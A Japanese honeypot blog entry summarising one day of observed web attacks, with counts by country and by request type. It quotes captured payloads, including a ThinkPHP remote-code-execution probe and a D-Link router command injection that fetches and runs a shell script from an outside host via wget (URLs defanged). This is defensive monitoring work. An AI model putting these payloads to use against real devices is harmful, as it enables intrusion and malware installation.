23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(145日目)

2019/08/08(木)

トータルは6322件でした。

ハンティングログは以下です。

118.25.42[.]134 wget hxxp[:]//54.37.74[.]232/sh

www.virustotal.com

IPのロケーション別の件数は以下です。

韓国 4131
イタリア 2112
中国 30
アメリ 10
オランダ 9
ブラジル 4
インドネシア 4
ドイツ 4
フランス 3
イラン 2
ウクライナ 2
スペイン 2
イギリス 1
ポーランド 1
イラク 1
ルーマニア 1
ペルー 1
ネパール 1
バングラデシュ 1
セルビア 1
インド 1

f:id:sec23:20190809201635p:plain

件数 概要 リクエス
6245 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
48 アクセス GET /
4 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
3 D-Linkルーター脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//54.37.74[.]232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 vTiger CRMの調査 GET //vtigercrm/vtigerservice.php
2 不正中継の調査 CONNECT i[.]instagram[.]com:443
1 WebDAVの調査 PROPFIND /
1 WebLogicの調査 POST /wls-wsat/CoordinatorPortType
1 クローリング HEAD /robots.txt
1 Struts2の調査 GET /login.action
1 Struts2の調査 GET /index.action
1 不明 GET /js/preload/example.txt
1 アクセス GET /favicon.ico
1 CGIPHPの調査 GET /cgi-bin